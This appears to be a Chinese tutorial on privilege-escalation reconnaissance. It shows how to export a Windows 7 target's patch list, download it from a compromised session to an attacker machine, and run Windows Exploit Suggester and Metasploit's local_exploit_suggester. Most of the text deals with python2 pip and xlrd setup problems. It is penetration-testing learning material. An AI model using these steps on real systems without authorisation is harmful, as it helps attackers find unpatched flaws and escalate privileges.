Windows Exploit Suggester工具:将系统中已经安装的补丁程序与微软的漏洞数据库进行比较,并可以识别可能导致权限提升的漏洞,而其需要的只有目标系统的信息
下载地址:https://github.com/GDSSecurity/Windows-Exploit-Suggester
(如果下载失败,可以看之前的文章)
1.使用systeminfo 命令 ,并将补丁信息导入文件(patches.txt)(shell)
systeminfo > patches.txt
2.将目标机win7中patches.txt文件下载到攻击机中
(注意:目标机文件路径是 / ,与windows系统中文件路径相反)
download c:/patches.txt /root
3.从微软官方网站下载安全公告数据库,下载的文件会自动在当前目录下以excel电子表格的形式保存(注意:执行 py 文件需要到下载目录路径下 )
4.安装xlrd模块
(python操作excel主要用到xlrd和xlwt这两个库,即xlrd是读excel,xlwt是写excel的库)
注意: Windows Exploit Suggester 是需要在python2环境下运行
(Ubuntu中一般自带python2和python3,但python2是没有pip的)
(1)查看python2有没有下载pip(不存在会出现 :No module named pip)
(2)首先查看当前默认python pip版本,可以看到python3 pip存在位置,而python2 位置跟python3一样,通过这可以找到python 2所在位置
pip -V
(3)切换到python2.7的pip安装目录
cd /usr/local/lib/python2.7/dist-packages/
(4)下载pip
注意:此时 python 为 python2(设置),如果默认为 python3 ,运行时python 改成 python2
或者 设置默认 python 为 python2 (之前文章有提过切换python版本)
(用哪个版本的 Python 运行安装脚本,pip 就被关联到哪个版本)
wget https://bootstrap.pypa.io/get-pip.py
python get-pip.py # python2
(5)下载 xlrd模块(注意此时是 python2)
pip install xlrd --upgrade
黄色警告只是python2停止更新,目前python2所能接收的pip最高版本为20,不能接收21
(6)执行命令,检查系统中是否存在未修复漏洞
./windows-exploit-suggester.py -d 2021-11-01-mssb.xls -i patches.txt
出现错误,xlrd 读取数据失败,原因:xlrd模块为2.0.1版本,更新版本后,xlrd不支持xlsx格式数据的读取
解决方案:卸载目前的 xlrd,下载低版本 xlrd
pip uninstall xlrd
pip install xlrd==1.2.0 --upgrade
(7)此时再重新运行命令,可以成功了
./windows-exploit-suggester.py -d 2021-11-01-mssb.xls -i patches.txt
参考:kali解决python2.7和python3同时存在No module named pip的问题 (压缩包pip下载方式)
除此之外,msf中还内置了 local_exploit_suggester,快速识别系统中可能被利用的漏洞
use post/multi/recon/local_exploit_suggester
set session 2(id) //对应程序session ID
set LHOST 192.168.110.130